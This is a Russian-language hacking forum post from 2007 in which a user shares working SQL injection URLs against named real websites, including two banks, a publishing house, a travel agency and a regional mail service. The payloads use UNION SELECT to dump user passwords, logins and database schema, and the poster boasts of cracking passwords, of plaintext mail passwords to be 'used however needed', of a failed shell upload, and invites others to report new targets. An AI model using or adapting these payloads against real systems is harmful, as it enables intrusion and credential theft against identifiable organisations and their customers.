Показать сообщение отдельно

  #6  
Старый 22.11.2007, 12:51
fntms
Новичок
Регистрация: 21.11.2007
Сообщений: 15
С нами: 9721674

Репутация: 21
По умолчанию

http://maxitour.ru/hotels?id=-311%20union%20select%201,2,3,4,5,6,7,8,9,10,11,pas sw,13,14,15,16,17,18,19,20,21,22%20from%20users%20/*

все понятно без слов.. пароль расшифруется в три минуты.. а равен он логину..а логин макситурс вроде

http://www.newkenigsberg.ru/index.php?change=-21%20union%20select%201,2,3,concat(login,char(47), password,char(47),admin,char(47),Admtm,char(47),ph oto,char(47),Email,char(47),info,char(47),phone,ch ar(47),address,char(47),anons),5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,33,32,34,35,36,37,38,39,40,41,42,43,44,45,4 6,47,48%20from%20auth_user/*

мускул пятый..все на экране...сайт издательского дома еврорубль..в калининграде

газэнергопромбанк..
не знаю кто как..
http://www.geprobank.ru/press/banknews/?article=-1959%20union%20select%201,2,3,4,5,6,table_name,8,t able_schema,10,11,12%20from%20information_schema.t ables%20limit%2015,1/*

пятый мускул..таблицы наружу..чет смыкал смыкмал..ничего интересного ен насмыкал..пишите.


http://mkb.ru/about_bank/work/vacancy.php?id=31%20AND%201=3%20union%20select%201 ,2,AES_DECRYPT(AES_ENCRYPT(column_name,0x71),0x71) ,4,5,6,7,8,9,10,11,12%20from%20information_schema. columns%20where%20table_name='users'%20AND%20table _schema='struct'%20limit%201,1/*

московский кредитный банк.. да защита у банков нынче никакая..еще с менатепа все начинал.. есть две или три таблицы юзерз ..правда инфа в них разнаю.. бд с инфой о юзерах онлайн банкинга находится на другом серваке..пролезть не удалось, если кто откроет новые просторы для боевых действий, просьба отписаться..

вот тут прикольно ..уралвеб..почта!
http://www.uralweb.ru/tourism/index.php?region_sel=all&tour_sel=-4%20UNION%20select%201,2,table_name,4,5,6,7,8,9%20 from%20information_schema.tables%20/*&place=47

есть бд mail..там чет типа аккаунтс или мемберс..ну найти легко, опять же пятый мускул ..смотрим имена таблиц и полей.. находим почтовик с открытыми паролями..юзаем кто кому как надо.. залить шел так и не получилось..
 
Ответить с цитированием